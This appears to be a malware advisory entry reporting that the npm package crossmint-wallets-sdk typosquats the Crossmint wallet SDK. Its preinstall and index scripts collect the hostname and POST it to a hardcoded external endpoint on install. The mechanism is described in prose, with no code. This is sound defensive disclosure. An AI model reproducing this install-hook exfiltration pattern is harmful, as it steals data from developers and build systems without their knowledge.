—

MAL-2026-6545

Malicious code in crossmint-wallets-sdk (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (dd4caebfba35b43bf10f156fe687f455e95b09a514b8644fe1a900b63f1bf78a) Package name impersonates the Crossmint wallet SDK family. Both preinstall.js and index.js import child_process, capture host identifiers (hostname is read on line 7/9 respectively), and POST the collected data via https.request to a hardcoded external endpoint (line 12/23). The preinstall.js path fires automatically on `npm install` before any user code runs, giving the publisher install-time data exfiltration from any developer or build system that installs this package. The combination of child_process + hostname collection + outbound POST in a preinstall lifecycle script, in a package whose name typosquats a known wallet SDK, matches the active-attack credential/reconnaissance exfiltration fingerprint.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / crossmint-wallets-sdk

Introduced in: 0

No fixed version published yet for crossmint-wallets-sdk (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/crossmint-wallets-sdk/v/1.0.0 [PACKAGE]